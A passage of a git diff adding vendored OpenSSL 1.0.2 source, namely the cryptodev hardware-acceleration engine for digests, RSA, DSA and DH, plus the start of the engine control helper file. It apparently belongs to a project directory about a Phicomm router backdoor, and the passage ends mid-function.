+    sess->mackey = state->dummy_mac_key;
+    sess->mackeylen = digest_key_length(ctx->digest->type);
+    sess->mac = digest;
+
+    if (ioctl(state->d_fd, CIOCGSESSION, sess) < 0) {
+        put_dev_crypto(state->d_fd);
+        state->d_fd = -1;
+        printf("cryptodev_digest_init: Open session failed\n");
+        return (0);
+    }
+
+    return (1);
+}
+
+static int cryptodev_digest_update(EVP_MD_CTX *ctx, const void *data,
+                                   size_t count)
+{
+    struct crypt_op cryp;
+    struct dev_crypto_state *state = ctx->md_data;
+    struct session_op *sess = &state->d_sess;
+
+    if (!data || state->d_fd < 0) {
+        printf("cryptodev_digest_update: illegal inputs \n");
+        return (0);
+    }
+
+    if (!count) {
+        return (0);
+    }
+
+    if (!(ctx->flags & EVP_MD_CTX_FLAG_ONESHOT)) {
+        /* if application doesn't support one buffer */
+        state->mac_data =
+            OPENSSL_realloc(state->mac_data, state->mac_len + count);
+
+        if (!state->mac_data) {
+            printf("cryptodev_digest_update: realloc failed\n");
+            return (0);
+        }
+
+        memcpy(state->mac_data + state->mac_len, data, count);
+        state->mac_len += count;
+
+        return (1);
+    }
+
+    memset(&cryp, 0, sizeof(cryp));
+
+    cryp.ses = sess->ses;
+    cryp.flags = 0;
+    cryp.len = count;
+    cryp.src = (caddr_t) data;
+    cryp.dst = NULL;
+    cryp.mac = (caddr_t) state->digest_res;
+    if (ioctl(state->d_fd, CIOCCRYPT, &cryp) < 0) {
+        printf("cryptodev_digest_update: digest failed\n");
+        return (0);
+    }
+    return (1);
+}
+
+static int cryptodev_digest_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    struct crypt_op cryp;
+    struct dev_crypto_state *state = ctx->md_data;
+    struct session_op *sess = &state->d_sess;
+
+    int ret = 1;
+
+    if (!md || state->d_fd < 0) {
+        printf("cryptodev_digest_final: illegal input\n");
+        return (0);
+    }
+
+    if (!(ctx->flags & EVP_MD_CTX_FLAG_ONESHOT)) {
+        /* if application doesn't support one buffer */
+        memset(&cryp, 0, sizeof(cryp));
+        cryp.ses = sess->ses;
+        cryp.flags = 0;
+        cryp.len = state->mac_len;
+        cryp.src = state->mac_data;
+        cryp.dst = NULL;
+        cryp.mac = (caddr_t) md;
+        if (ioctl(state->d_fd, CIOCCRYPT, &cryp) < 0) {
+            printf("cryptodev_digest_final: digest failed\n");
+            return (0);
+        }
+
+        return 1;
+    }
+
+    memcpy(md, state->digest_res, ctx->digest->md_size);
+
+    return (ret);
+}
+
+static int cryptodev_digest_cleanup(EVP_MD_CTX *ctx)
+{
+    int ret = 1;
+    struct dev_crypto_state *state = ctx->md_data;
+    struct session_op *sess = &state->d_sess;
+
+    if (state == NULL)
+        return 0;
+
+    if (state->d_fd < 0) {
+        printf("cryptodev_digest_cleanup: illegal input\n");
+        return (0);
+    }
+
+    if (state->mac_data) {
+        OPENSSL_free(state->mac_data);
+        state->mac_data = NULL;
+        state->mac_len = 0;
+    }
+
+    if (ioctl(state->d_fd, CIOCFSESSION, &sess->ses) < 0) {
+        printf("cryptodev_digest_cleanup: failed to close session\n");
+        ret = 0;
+    } else {
+        ret = 1;
+    }
+    put_dev_crypto(state->d_fd);
+    state->d_fd = -1;
+
+    return (ret);
+}
+
+static int cryptodev_digest_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from)
+{
+    struct dev_crypto_state *fstate = from->md_data;
+    struct dev_crypto_state *dstate = to->md_data;
+    struct session_op *sess;
+    int digest;
+
+    if (dstate == NULL || fstate == NULL)
+        return 1;
+
+    memcpy(dstate, fstate, sizeof(struct dev_crypto_state));
+
+    sess = &dstate->d_sess;
+
+    digest = digest_nid_to_cryptodev(to->digest->type);
+
+    sess->mackey = dstate->dummy_mac_key;
+    sess->mackeylen = digest_key_length(to->digest->type);
+    sess->mac = digest;
+
+    dstate->d_fd = get_dev_crypto();
+
+    if (ioctl(dstate->d_fd, CIOCGSESSION, sess) < 0) {
+        put_dev_crypto(dstate->d_fd);
+        dstate->d_fd = -1;
+        printf("cryptodev_digest_init: Open session failed\n");
+        return (0);
+    }
+
+    if (fstate->mac_len != 0) {
+        if (fstate->mac_data != NULL) {
+            dstate->mac_data = OPENSSL_malloc(fstate->mac_len);
+            memcpy(dstate->mac_data, fstate->mac_data, fstate->mac_len);
+            dstate->mac_len = fstate->mac_len;
+        }
+    }
+
+    return 1;
+}
+
+const EVP_MD cryptodev_sha1 = {
+    NID_sha1,
+    NID_undef,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_ONESHOT,
+    cryptodev_digest_init,
+    cryptodev_digest_update,
+    cryptodev_digest_final,
+    cryptodev_digest_copy,
+    cryptodev_digest_cleanup,
+    EVP_PKEY_NULL_method,
+    SHA_CBLOCK,
+    sizeof(struct dev_crypto_state),
+};
+
+const EVP_MD cryptodev_md5 = {
+    NID_md5,
+    NID_undef,
+    16 /* MD5_DIGEST_LENGTH */ ,
+    EVP_MD_FLAG_ONESHOT,
+    cryptodev_digest_init,
+    cryptodev_digest_update,
+    cryptodev_digest_final,
+    cryptodev_digest_copy,
+    cryptodev_digest_cleanup,
+    EVP_PKEY_NULL_method,
+    64 /* MD5_CBLOCK */ ,
+    sizeof(struct dev_crypto_state),
+};
+
+# endif                         /* USE_CRYPTODEV_DIGESTS */
+
+static int
+cryptodev_engine_digests(ENGINE *e, const EVP_MD **digest,
+                         const int **nids, int nid)
+{
+    if (!digest)
+        return (cryptodev_usable_digests(nids));
+
+    switch (nid) {
+# ifdef USE_CRYPTODEV_DIGESTS
+    case NID_md5:
+        *digest = &cryptodev_md5;
+        break;
+    case NID_sha1:
+        *digest = &cryptodev_sha1;
+        break;
+    default:
+# endif                         /* USE_CRYPTODEV_DIGESTS */
+        *digest = NULL;
+        break;
+    }
+    return (*digest != NULL);
+}
+
+/*
+ * Convert a BIGNUM to the representation that /dev/crypto needs.
+ * Upon completion of use, the caller is responsible for freeing
+ * crp->crp_p.
+ */
+static int bn2crparam(const BIGNUM *a, struct crparam *crp)
+{
+    int i, j, k;
+    ssize_t bytes, bits;
+    u_char *b;
+
+    crp->crp_p = NULL;
+    crp->crp_nbits = 0;
+
+    bits = BN_num_bits(a);
+    bytes = (bits + 7) / 8;
+
+    b = malloc(bytes);
+    if (b == NULL)
+        return (1);
+    memset(b, 0, bytes);
+
+    crp->crp_p = (caddr_t) b;
+    crp->crp_nbits = bits;
+
+    for (i = 0, j = 0; i < a->top; i++) {
+        for (k = 0; k < BN_BITS2 / 8; k++) {
+            if ((j + k) >= bytes)
+                return (0);
+            b[j + k] = a->d[i] >> (k * 8);
+        }
+        j += BN_BITS2 / 8;
+    }
+    return (0);
+}
+
+/* Convert a /dev/crypto parameter to a BIGNUM */
+static int crparam2bn(struct crparam *crp, BIGNUM *a)
+{
+    u_int8_t *pd;
+    int i, bytes;
+
+    bytes = (crp->crp_nbits + 7) / 8;
+
+    if (bytes == 0)
+        return (-1);
+
+    if ((pd = (u_int8_t *) malloc(bytes)) == NULL)
+        return (-1);
+
+    for (i = 0; i < bytes; i++)
+        pd[i] = crp->crp_p[bytes - i - 1];
+
+    BN_bin2bn(pd, bytes, a);
+    free(pd);
+
+    return (0);
+}
+
+static void zapparams(struct crypt_kop *kop)
+{
+    int i;
+
+    for (i = 0; i < kop->crk_iparams + kop->crk_oparams; i++) {
+        if (kop->crk_param[i].crp_p)
+            free(kop->crk_param[i].crp_p);
+        kop->crk_param[i].crp_p = NULL;
+        kop->crk_param[i].crp_nbits = 0;
+    }
+}
+
+static int
+cryptodev_asym(struct crypt_kop *kop, int rlen, BIGNUM *r, int slen,
+               BIGNUM *s)
+{
+    int fd, ret = -1;
+
+    if ((fd = get_asym_dev_crypto()) < 0)
+        return (ret);
+
+    if (r) {
+        kop->crk_param[kop->crk_iparams].crp_p = calloc(rlen, sizeof(char));
+        kop->crk_param[kop->crk_iparams].crp_nbits = rlen * 8;
+        kop->crk_oparams++;
+    }
+    if (s) {
+        kop->crk_param[kop->crk_iparams + 1].crp_p =
+            calloc(slen, sizeof(char));
+        kop->crk_param[kop->crk_iparams + 1].crp_nbits = slen * 8;
+        kop->crk_oparams++;
+    }
+
+    if (ioctl(fd, CIOCKEY, kop) == 0) {
+        if (r)
+            crparam2bn(&kop->crk_param[kop->crk_iparams], r);
+        if (s)
+            crparam2bn(&kop->crk_param[kop->crk_iparams + 1], s);
+        ret = 0;
+    }
+
+    return (ret);
+}
+
+static int
+cryptodev_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                     const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    struct crypt_kop kop;
+    int ret = 1;
+
+    /*
+     * Currently, we know we can do mod exp iff we can do any asymmetric
+     * operations at all.
+     */
+    if (cryptodev_asymfeat == 0) {
+        ret = BN_mod_exp(r, a, p, m, ctx);
+        return (ret);
+    }
+
+    memset(&kop, 0, sizeof kop);
+    kop.crk_op = CRK_MOD_EXP;
+
+    /* inputs: a^p % m */
+    if (bn2crparam(a, &kop.crk_param[0]))
+        goto err;
+    if (bn2crparam(p, &kop.crk_param[1]))
+        goto err;
+    if (bn2crparam(m, &kop.crk_param[2]))
+        goto err;
+    kop.crk_iparams = 3;
+
+    if (cryptodev_asym(&kop, BN_num_bytes(m), r, 0, NULL)) {
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        printf("OCF asym process failed, Running in software\n");
+        ret = meth->bn_mod_exp(r, a, p, m, ctx, in_mont);
+
+    } else if (ECANCELED == kop.crk_status) {
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        printf("OCF hardware operation cancelled. Running in Software\n");
+        ret = meth->bn_mod_exp(r, a, p, m, ctx, in_mont);
+    }
+    /* else cryptodev operation worked ok ==> ret = 1 */
+
+ err:
+    zapparams(&kop);
+    return (ret);
+}
+
+static int
+cryptodev_rsa_nocrt_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                            BN_CTX *ctx)
+{
+    int r;
+    ctx = BN_CTX_new();
+    r = cryptodev_bn_mod_exp(r0, I, rsa->d, rsa->n, ctx, NULL);
+    BN_CTX_free(ctx);
+    return (r);
+}
+
+static int
+cryptodev_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa, BN_CTX *ctx)
+{
+    struct crypt_kop kop;
+    int ret = 1;
+
+    if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+        /* XXX 0 means failure?? */
+        return (0);
+    }
+
+    memset(&kop, 0, sizeof kop);
+    kop.crk_op = CRK_MOD_EXP_CRT;
+    /* inputs: rsa->p rsa->q I rsa->dmp1 rsa->dmq1 rsa->iqmp */
+    if (bn2crparam(rsa->p, &kop.crk_param[0]))
+        goto err;
+    if (bn2crparam(rsa->q, &kop.crk_param[1]))
+        goto err;
+    if (bn2crparam(I, &kop.crk_param[2]))
+        goto err;
+    if (bn2crparam(rsa->dmp1, &kop.crk_param[3]))
+        goto err;
+    if (bn2crparam(rsa->dmq1, &kop.crk_param[4]))
+        goto err;
+    if (bn2crparam(rsa->iqmp, &kop.crk_param[5]))
+        goto err;
+    kop.crk_iparams = 6;
+
+    if (cryptodev_asym(&kop, BN_num_bytes(rsa->n), r0, 0, NULL)) {
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        printf("OCF asym process failed, running in Software\n");
+        ret = (*meth->rsa_mod_exp) (r0, I, rsa, ctx);
+
+    } else if (ECANCELED == kop.crk_status) {
+        const RSA_METHOD *meth = RSA_PKCS1_SSLeay();
+        printf("OCF hardware operation cancelled. Running in Software\n");
+        ret = (*meth->rsa_mod_exp) (r0, I, rsa, ctx);
+    }
+    /* else cryptodev operation worked ok ==> ret = 1 */
+
+ err:
+    zapparams(&kop);
+    return (ret);
+}
+
+static RSA_METHOD cryptodev_rsa = {
+    "cryptodev RSA method",
+    NULL,                       /* rsa_pub_enc */
+    NULL,                       /* rsa_pub_dec */
+    NULL,                       /* rsa_priv_enc */
+    NULL,                       /* rsa_priv_dec */
+    NULL,
+    NULL,
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* rsa_sign */
+    NULL                        /* rsa_verify */
+};
+
+static int
+cryptodev_dsa_bn_mod_exp(DSA *dsa, BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return (cryptodev_bn_mod_exp(r, a, p, m, ctx, m_ctx));
+}
+
+static int
+cryptodev_dsa_dsa_mod_exp(DSA *dsa, BIGNUM *t1, BIGNUM *g,
+                          BIGNUM *u1, BIGNUM *pub_key, BIGNUM *u2, BIGNUM *p,
+                          BN_CTX *ctx, BN_MONT_CTX *mont)
+{
+    BIGNUM t2;
+    int ret = 0;
+
+    BN_init(&t2);
+
+    /* v = ( g^u1 * y^u2 mod p ) mod q */
+    /* let t1 = g ^ u1 mod p */
+    ret = 0;
+
+    if (!dsa->meth->bn_mod_exp(dsa, t1, dsa->g, u1, dsa->p, ctx, mont))
+        goto err;
+
+    /* let t2 = y ^ u2 mod p */
+    if (!dsa->meth->bn_mod_exp(dsa, &t2, dsa->pub_key, u2, dsa->p, ctx, mont))
+        goto err;
+    /* let u1 = t1 * t2 mod p */
+    if (!BN_mod_mul(u1, t1, &t2, dsa->p, ctx))
+        goto err;
+
+    BN_copy(t1, u1);
+
+    ret = 1;
+ err:
+    BN_free(&t2);
+    return (ret);
+}
+
+static DSA_SIG *cryptodev_dsa_do_sign(const unsigned char *dgst, int dlen,
+                                      DSA *dsa)
+{
+    struct crypt_kop kop;
+    BIGNUM *r = NULL, *s = NULL;
+    DSA_SIG *dsaret = NULL;
+
+    if ((r = BN_new()) == NULL)
+        goto err;
+    if ((s = BN_new()) == NULL) {
+        BN_free(r);
+        goto err;
+    }
+
+    memset(&kop, 0, sizeof kop);
+    kop.crk_op = CRK_DSA_SIGN;
+
+    /* inputs: dgst dsa->p dsa->q dsa->g dsa->priv_key */
+    kop.crk_param[0].crp_p = (caddr_t) dgst;
+    kop.crk_param[0].crp_nbits = dlen * 8;
+    if (bn2crparam(dsa->p, &kop.crk_param[1]))
+        goto err;
+    if (bn2crparam(dsa->q, &kop.crk_param[2]))
+        goto err;
+    if (bn2crparam(dsa->g, &kop.crk_param[3]))
+        goto err;
+    if (bn2crparam(dsa->priv_key, &kop.crk_param[4]))
+        goto err;
+    kop.crk_iparams = 5;
+
+    if (cryptodev_asym(&kop, BN_num_bytes(dsa->q), r,
+                       BN_num_bytes(dsa->q), s) == 0) {
+        dsaret = DSA_SIG_new();
+        dsaret->r = r;
+        dsaret->s = s;
+    } else {
+        const DSA_METHOD *meth = DSA_OpenSSL();
+        BN_free(r);
+        BN_free(s);
+        dsaret = (meth->dsa_do_sign) (dgst, dlen, dsa);
+    }
+ err:
+    kop.crk_param[0].crp_p = NULL;
+    zapparams(&kop);
+    return (dsaret);
+}
+
+static int
+cryptodev_dsa_verify(const unsigned char *dgst, int dlen,
+                     DSA_SIG *sig, DSA *dsa)
+{
+    struct crypt_kop kop;
+    int dsaret = 1;
+
+    memset(&kop, 0, sizeof kop);
+    kop.crk_op = CRK_DSA_VERIFY;
+
+    /* inputs: dgst dsa->p dsa->q dsa->g dsa->pub_key sig->r sig->s */
+    kop.crk_param[0].crp_p = (caddr_t) dgst;
+    kop.crk_param[0].crp_nbits = dlen * 8;
+    if (bn2crparam(dsa->p, &kop.crk_param[1]))
+        goto err;
+    if (bn2crparam(dsa->q, &kop.crk_param[2]))
+        goto err;
+    if (bn2crparam(dsa->g, &kop.crk_param[3]))
+        goto err;
+    if (bn2crparam(dsa->pub_key, &kop.crk_param[4]))
+        goto err;
+    if (bn2crparam(sig->r, &kop.crk_param[5]))
+        goto err;
+    if (bn2crparam(sig->s, &kop.crk_param[6]))
+        goto err;
+    kop.crk_iparams = 7;
+
+    if (cryptodev_asym(&kop, 0, NULL, 0, NULL) == 0) {
+        /*
+         * OCF success value is 0, if not zero, change dsaret to fail
+         */
+        if (0 != kop.crk_status)
+            dsaret = 0;
+    } else {
+        const DSA_METHOD *meth = DSA_OpenSSL();
+
+        dsaret = (meth->dsa_do_verify) (dgst, dlen, sig, dsa);
+    }
+ err:
+    kop.crk_param[0].crp_p = NULL;
+    zapparams(&kop);
+    return (dsaret);
+}
+
+static DSA_METHOD cryptodev_dsa = {
+    "cryptodev DSA method",
+    NULL,
+    NULL,                       /* dsa_sign_setup */
+    NULL,
+    NULL,                       /* dsa_mod_exp */
+    NULL,
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+
+static int
+cryptodev_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                     const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                     BN_MONT_CTX *m_ctx)
+{
+    return (cryptodev_bn_mod_exp(r, a, p, m, ctx, m_ctx));
+}
+
+static int
+cryptodev_dh_compute_key(unsigned char *key, const BIGNUM *pub_key, DH *dh)
+{
+    struct crypt_kop kop;
+    int dhret = 1;
+    int fd, keylen;
+
+    if ((fd = get_asym_dev_crypto()) < 0) {
+        const DH_METHOD *meth = DH_OpenSSL();
+
+        return ((meth->compute_key) (key, pub_key, dh));
+    }
+
+    keylen = BN_num_bits(dh->p);
+
+    memset(&kop, 0, sizeof kop);
+    kop.crk_op = CRK_DH_COMPUTE_KEY;
+
+    /* inputs: dh->priv_key pub_key dh->p key */
+    if (bn2crparam(dh->priv_key, &kop.crk_param[0]))
+        goto err;
+    if (bn2crparam(pub_key, &kop.crk_param[1]))
+        goto err;
+    if (bn2crparam(dh->p, &kop.crk_param[2]))
+        goto err;
+    kop.crk_iparams = 3;
+
+    kop.crk_param[3].crp_p = (caddr_t) key;
+    kop.crk_param[3].crp_nbits = keylen * 8;
+    kop.crk_oparams = 1;
+
+    if (ioctl(fd, CIOCKEY, &kop) == -1) {
+        const DH_METHOD *meth = DH_OpenSSL();
+
+        dhret = (meth->compute_key) (key, pub_key, dh);
+    }
+ err:
+    kop.crk_param[3].crp_p = NULL;
+    zapparams(&kop);
+    return (dhret);
+}
+
+static DH_METHOD cryptodev_dh = {
+    "cryptodev DH method",
+    NULL,                       /* cryptodev_dh_generate_key */
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+
+/*
+ * ctrl right now is just a wrapper that doesn't do much
+ * but I expect we'll want some options soon.
+ */
+static int
+cryptodev_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+# ifdef HAVE_SYSLOG_R
+    struct syslog_data sd = SYSLOG_DATA_INIT;
+# endif
+
+    switch (cmd) {
+    default:
+# ifdef HAVE_SYSLOG_R
+        syslog_r(LOG_ERR, &sd, "cryptodev_ctrl: unknown command %d", cmd);
+# else
+        syslog(LOG_ERR, "cryptodev_ctrl: unknown command %d", cmd);
+# endif
+        break;
+    }
+    return (1);
+}
+
+void ENGINE_load_cryptodev(void)
+{
+    ENGINE *engine = ENGINE_new();
+    int fd;
+
+    if (engine == NULL)
+        return;
+    if ((fd = get_dev_crypto()) < 0) {
+        ENGINE_free(engine);
+        return;
+    }
+
+    /*
+     * find out what asymmetric crypto algorithms we support
+     */
+    if (ioctl(fd, CIOCASYMFEAT, &cryptodev_asymfeat) == -1) {
+        put_dev_crypto(fd);
+        ENGINE_free(engine);
+        return;
+    }
+    put_dev_crypto(fd);
+
+    if (!ENGINE_set_id(engine, "cryptodev") ||
+        !ENGINE_set_name(engine, "BSD cryptodev engine") ||
+        !ENGINE_set_ciphers(engine, cryptodev_engine_ciphers) ||
+        !ENGINE_set_digests(engine, cryptodev_engine_digests) ||
+        !ENGINE_set_ctrl_function(engine, cryptodev_ctrl) ||
+        !ENGINE_set_cmd_defns(engine, cryptodev_defns)) {
+        ENGINE_free(engine);
+        return;
+    }
+
+    if (ENGINE_set_RSA(engine, &cryptodev_rsa)) {
+        const RSA_METHOD *rsa_meth = RSA_PKCS1_SSLeay();
+
+        cryptodev_rsa.bn_mod_exp = rsa_meth->bn_mod_exp;
+        cryptodev_rsa.rsa_mod_exp = rsa_meth->rsa_mod_exp;
+        cryptodev_rsa.rsa_pub_enc = rsa_meth->rsa_pub_enc;
+        cryptodev_rsa.rsa_pub_dec = rsa_meth->rsa_pub_dec;
+        cryptodev_rsa.rsa_priv_enc = rsa_meth->rsa_priv_enc;
+        cryptodev_rsa.rsa_priv_dec = rsa_meth->rsa_priv_dec;
+        if (cryptodev_asymfeat & CRF_MOD_EXP) {
+            cryptodev_rsa.bn_mod_exp = cryptodev_bn_mod_exp;
+            if (cryptodev_asymfeat & CRF_MOD_EXP_CRT)
+                cryptodev_rsa.rsa_mod_exp = cryptodev_rsa_mod_exp;
+            else
+                cryptodev_rsa.rsa_mod_exp = cryptodev_rsa_nocrt_mod_exp;
+        }
+    }
+
+    if (ENGINE_set_DSA(engine, &cryptodev_dsa)) {
+        const DSA_METHOD *meth = DSA_OpenSSL();
+
+        memcpy(&cryptodev_dsa, meth, sizeof(DSA_METHOD));
+        if (cryptodev_asymfeat & CRF_DSA_SIGN)
+            cryptodev_dsa.dsa_do_sign = cryptodev_dsa_do_sign;
+        if (cryptodev_asymfeat & CRF_MOD_EXP) {
+            cryptodev_dsa.bn_mod_exp = cryptodev_dsa_bn_mod_exp;
+            cryptodev_dsa.dsa_mod_exp = cryptodev_dsa_dsa_mod_exp;
+        }
+        if (cryptodev_asymfeat & CRF_DSA_VERIFY)
+            cryptodev_dsa.dsa_do_verify = cryptodev_dsa_verify;
+    }
+
+    if (ENGINE_set_DH(engine, &cryptodev_dh)) {
+        const DH_METHOD *dh_meth = DH_OpenSSL();
+
+        cryptodev_dh.generate_key = dh_meth->generate_key;
+        cryptodev_dh.compute_key = dh_meth->compute_key;
+        cryptodev_dh.bn_mod_exp = dh_meth->bn_mod_exp;
+        if (cryptodev_asymfeat & CRF_MOD_EXP) {
+            cryptodev_dh.bn_mod_exp = cryptodev_mod_exp_dh;
+            if (cryptodev_asymfeat & CRF_DH_COMPUTE_KEY)
+                cryptodev_dh.compute_key = cryptodev_dh_compute_key;
+        }
+    }
+
+    ENGINE_add(engine);
+    ENGINE_free(engine);
+    ERR_clear_error();
+}
+
+#endif                          /* HAVE_CRYPTODEV */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_ctrl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_ctrl.c
new file mode 100644
index 0000000..e6c0dfb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_ctrl.c
@@ -0,0 +1,385 @@
+/* crypto/engine/eng_ctrl.c */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * When querying a ENGINE-specific control command's 'description', this
+ * string is used if the ENGINE_CMD_DEFN has cmd_desc set to NULL.
+ */
+static const char *int_no_description = "";
+
+/*
+ * These internal functions handle 'CMD'-related control commands when the
+ * ENGINE in question has asked us to take care of it (ie. the ENGINE did not
+ * set the ENGINE_FLAGS_MANUAL_CMD_CTRL flag.
+ */
+
+static int int_ctrl_cmd_is_null(const ENGINE_CMD_DEFN *defn)
+{
+    if ((defn->cmd_num == 0) || (defn->cmd_name == NULL))
+        return 1;
+    return 0;
+}
+
+static int int_ctrl_cmd_by_name(const ENGINE_CMD_DEFN *defn, const char *s)
+{
+    int idx = 0;
+    while (!int_ctrl_cmd_is_null(defn) && (strcmp(defn->cmd_name, s) != 0)) {
+        idx++;
+        defn++;
+    }
+    if (int_ctrl_cmd_is_null(defn))
+        /* The given name wasn't found */
+        return -1;
+    return idx;
+}
+
+static int int_ctrl_cmd_by_num(const ENGINE_CMD_DEFN *defn, unsigned int num)
+{
+    int idx = 0;
+    /*
+     * NB: It is stipulated that 'cmd_defn' lists are ordered by cmd_num. So
+     * our searches don't need to take any longer than necessary.
+     */
+    while (!int_ctrl_cmd_is_null(defn) && (defn->cmd_num < num)) {
+        idx++;
+        defn++;
+    }
+    if (defn->cmd_num == num)
+        return idx;
+    /* The given cmd_num wasn't found */
+    return -1;
+}
+
+static int int_ctrl_helper(ENGINE *e, int cmd, long i, void *p,
+                           void (*f) (void))
+{
+    int idx;
+    char *s = (char *)p;
+    /* Take care of the easy one first (eg. it requires no searches) */
+    if (cmd == ENGINE_CTRL_GET_FIRST_CMD_TYPE) {
+        if ((e->cmd_defns == NULL) || int_ctrl_cmd_is_null(e->cmd_defns))
+            return 0;
+        return e->cmd_defns->cmd_num;
+    }
+    /* One or two commands require that "p" be a valid string buffer */
+    if ((cmd == ENGINE_CTRL_GET_CMD_FROM_NAME) ||
+        (cmd == ENGINE_CTRL_GET_NAME_FROM_CMD) ||
+        (cmd == ENGINE_CTRL_GET_DESC_FROM_CMD)) {
+        if (s == NULL) {
+            ENGINEerr(ENGINE_F_INT_CTRL_HELPER, ERR_R_PASSED_NULL_PARAMETER);
+            return -1;
+        }
+    }
+    /* Now handle cmd_name -> cmd_num conversion */
+    if (cmd == ENGINE_CTRL_GET_CMD_FROM_NAME) {
+        if ((e->cmd_defns == NULL)
+            || ((idx = int_ctrl_cmd_by_name(e->cmd_defns, s)) < 0)) {
+            ENGINEerr(ENGINE_F_INT_CTRL_HELPER, ENGINE_R_INVALID_CMD_NAME);
+            return -1;
+        }
+        return e->cmd_defns[idx].cmd_num;
+    }
+    /*
+     * For the rest of the commands, the 'long' argument must specify a valie
+     * command number - so we need to conduct a search.
+     */
+    if ((e->cmd_defns == NULL) || ((idx = int_ctrl_cmd_by_num(e->cmd_defns,
+                                                              (unsigned int)
+                                                              i)) < 0)) {
+        ENGINEerr(ENGINE_F_INT_CTRL_HELPER, ENGINE_R_INVALID_CMD_NUMBER);
+        return -1;
+    }
+    /* Now the logic splits depending on command type */
+    switch (cmd) {
+    case ENGINE_CTRL_GET_NEXT_CMD_TYPE:
+        idx++;
+        if (int_ctrl_cmd_is_null(e->cmd_defns + idx))
+            /* end-of-list */
+            return 0;
+        else
+            return e->cmd_defns[idx].cmd_num;
+    case ENGINE_CTRL_GET_NAME_LEN_FROM_CMD:
+        return strlen(e->cmd_defns[idx].cmd_name);
+    case ENGINE_CTRL_GET_NAME_FROM_CMD:
+        return BIO_snprintf(s, strlen(e->cmd_defns[idx].cmd_name) + 1,
+                            "%s", e->cmd_defns[idx].cmd_name);
+    case ENGINE_CTRL_GET_DESC_LEN_FROM_CMD:
+        if (e->cmd_defns[idx].cmd_desc)
+            return strlen(e->cmd_defns[idx].cmd_desc);
+        return strlen(int_no_description);
+    case ENGINE_CTRL_GET_DESC_FROM_CMD:
+        if (e->cmd_defns[idx].cmd_desc)
+            return BIO_snprintf(s,
+                                strlen(e->cmd_defns[idx].cmd_desc) + 1,
+                                "%s", e->cmd_defns[idx].cmd_desc);
+        return BIO_snprintf(s, strlen(int_no_description) + 1, "%s",
+                            int_no_description);
+    case ENGINE_CTRL_GET_CMD_FLAGS:
+        return e->cmd_defns[idx].cmd_flags;
+    }
+    /* Shouldn't really be here ... */
